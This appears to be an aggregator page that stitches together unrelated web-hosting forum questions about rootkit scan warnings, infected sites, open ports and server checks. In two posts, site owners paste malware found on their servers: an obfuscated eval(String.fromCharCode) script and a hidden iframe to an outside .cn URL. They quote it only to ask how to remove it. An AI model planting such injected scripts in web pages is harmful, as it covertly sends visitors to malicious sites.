Checking `bindshell'... INFECTED (PORTS: 465)
Jul 29, 2007I run CHKROOTKIT Scan and found that:
Checking `bindshell'... INFECTED (PORTS: 465)
I run CHKROOTKIT Scan and found that:
Checking `bindshell'... INFECTED (PORTS: 465)
Quote:
Searching for rootedoor... nothing found
Searching for anomalies in shell history files... Warning: `//root/.mysql_history' file size is zero
nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS: 465)
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found
Above is a part of chkrootkit report i receive everyday,today seem something is wrong as bindshell is INFECTED.Any suggestion what should i do in this case?
I have opened up ports 5151 and 123 via iptables. From outside the box, is there a way I can verify that these ports are open?
View 6 Replies View Relatedi have one problem in cpanel take one error for restart httpd
xx.xxx.xxx.xx:0 -- mixing * ports and non-* ports with a NameVirtualHost address is not supported, proceeding with undefined results
I got a msg from the server that a port 444 is open in my server, how could i know what the bindshell ports open in my server and how to close it please ?
Code:
Checking `bindshell'... INFECTED (PORTS: 444)
i use cpanel/csf firewall
150 php pages infected codes like.... As we do not have a backup..is there any commands to remove it
<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,11 8,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61 ,34,105,10 2,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115, 114,39,43, 39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32 ,119,105,1 00,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,1 17,110,99, 116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51 ,48,52,49, 56,50,52))</script>
Is there any command to search and replace this whole string from files...normal sed is not seems to be working with these symbols.
seem that my server is infected by this virus Exploit.HTML.IESlice.h
it insert iframe code to index page and forward visitors to another site.
my server is running centos 4.5 and WHM/Cpanel, which antivirus software i need to use or other methods to eliminate this virus?
after week when my server upgrade the cpanel automatic i got infected in all
index files like index.html and index.php and index.asp and any index with any
extinstion and this is the code in all files
Code:
<iframe src=[url]
and when i delete this code it come again in all index files
i am in really trouble with my clients and i want to know how can i fix this
thing and never come back again
i see my websites are infected with some trojan.
there are some iframe tag simlilar to this in all index files
<iframe src="http://traff<<removed>>.cn/in.cgi?27" width=100 height=80></iframe>
any idea how might this iframe inserted in my codes.
i have tried to format my systems and remove all saved ftp passwords , but still this virus is comming back and the strange thing is i have website on different servers infected with same virus
any idea how this is happened and how to avoide this?
i have amny server , and i got about 7 server got infected
2 weeks ago i got some sites have avirs i delted the code which got added on some index.html & index.php " any index files "
i removed the code and cleaned the servers,
after 2 hrs i saw it back again.
i made scan and i got them back, i replaced the pages with cleaned pages, and removed it again.
but till now it came back after i remove.
how can i protict my server from this issus
My server is a linux based o
How I can check all the databases on my server to see which of the DBs are corrupted?
My server load is high, i checked and see everuthing is ok.
I think my sata disk cannot support my hard disk traffic.
Is it posible to check wich file used more hard disk traffic? (rpm speed)
I am looking at a VPS of one friend, using OpenVZ. It has 256MB RAM, but it always goes down, and the host asks my friend to upgrade to larger RAM. I have read that if UBC setting is too low, the VPS could not use all allocated RAM, not sure if it's correctly or not, but is there anyway to check?
This is some info ...
I have it installed on server, but sometimes it's dead, but no warning from system. It will prevent emails working then. So I wonder if there is any way to check clamav? when it's not working, system will release an email to the admin?
View 8 Replies View Relatedis there any method to check if all the memory on a server is working?
View 3 Replies View RelatedHow can figure out which functions are active on my server?
I have root access and the server is Linux.
I want to know wheather the function "fsockopen" is open or not.
I'm on shared hosting (apache) and would like to closer inspect my log files. 2 questions I have at the moment.
1. Where can I typically find my log files for downloading?
2. Is there any good (free) software I can use locally (Windows desktop) that can manage these logs i.e. stats, searches etc? At the moment I mainly want to run a search on the log files.
Is there a way to track outgoing mail that's sent from a Linux server? I'm running on Fedora 8 now, and would like to confirm and check mail that's being sent out by a PHP application.
View 4 Replies View RelatedSearching G, I find these for running checks on blacklisted ips:
http://whatismyipaddress.com/staticp...ss-blacklisted
http://www.mxtoolbox.com/blacklists.aspx
Which both seem to be for blacklisted email servers. But what about checking if the ip has been blacklisted for other reasons ( business practices, reports of complaint, adult sites, etc)
What is a decent check?
This is for checking on newly assigned dedicated ip's ( or other) before applying them to domains on a new account.
Checking a domain for RBL listing
How can I check if my domain is listed in the RBL listing?
I'd like to look at what my HELO configuration is but don't know how or where to look.
I am using a dedicated Linux/cPanel server. I'd like to make sure the HELO is configured correctly. My mailing software is EXIM.
I have installed 3dm for checking 3ware 8086 card status, but when going to [url] it doesnt show anything. It seems cannot connect to 1080 port, even I have turned off the firewall. Have checked in its config file already to make sure the port is 1080
Is there anyone having experience with 3dm software?
I'm thinking to implement a solution for our VOIP system so that automatic calls should be done several times a day and to check that someone is responding or that it's ringing.
We are using AsteriskWin32 for now and for our needs it's working great.
I received abuse, and I would like to know if there is a good method to check for clients who are sending out spam mail, so I can take action.
If you know any methods that would work to find clients who are sending out spam mail,
Calling all HyperVM/OpenVZ gurus!
Since OpenVZ offers both base RAM and burstable RAM to VMs, checking how much RAM is still available for assigning to VMs is still done manually by me.
Is there a way to list the total amount of base RAM that has been assigned, and the total amount of burstable RAM that has been assigned, so that you know how many more VMs you can create/host on a server?
Does anyone know where i can get script that can run on a server to check
if some users use above 50% of the resources or cpu load
Is there a way to check someone elses server for bandwidth usage?
I was asked this weekend if there is a way to get an estimate of bandwidth for a similar website to one a person wants to design?
which command we used to get detail information of a process running on server and which much give out put like below example
User Domain %CPU %MEM MySQL Processes
mydomainusername mydomain.com 36.78 247.14 5.9
Top Process %CPU 82.0 httpd [mydomain.com] [/forum/index.php?showtopic71748]
Top Process %CPU 64.5 httpd [mydomain.com] [/forum/]
Top Process %CPU 45.3 httpd [mydomain.com] [/forum/index.php?showforum11&prune_day100&sort_byZ-A&sor]
Different problem than my earlier thread:
[url]
I freely admit this is something that is self inflicted as I made the mistake of trying to install OpenSSH from source on my own despite me knowing that OpenSSL was kinda goofy (as in I had 0.9.8g and 0.9.8i libraries all over the place).
I know that I have OpenSSL 0.9.8k installed and working. PHP and Apache are both reporting that they are using the k release. I'm good there. However cURL and proftpd are still linking to the g release libraries and for the life of me, I cannot find where these buggers are. ld.so.conf is pointed at the newer libraries in /usr/local/lib and /usr/local/ssl/lib and I re-ran ldconfig to make sure.
Is there a way to verify a version of the library/so files because this is killing me. I'm kinda like Monk (USA TV) only instead of germs, I'm freaked out by lame libraries and includes.
edit: what I *think* is happening, based on the timestamps, is that cURL and proftpd are using the libraries in the /usr/lib64 directory instead of /usr/lib. What I don't get is when I make;make install, why things are only going into /usr/lib and /usr/local/lib and not into the /usr/lib64 directory despite my ./config stating that the libraries are being built for x86_64. Is it as simple as copying things over?
what are some of the ways to minimize credit/debit card fraud when someone purchases services over the Internet? I understand the following are commonly used:
-AVS check
-IP of customer vs. Billing Address
-Amount of order
With chargeback fees so high I'd really like to minimize fraud without tossing legit orders.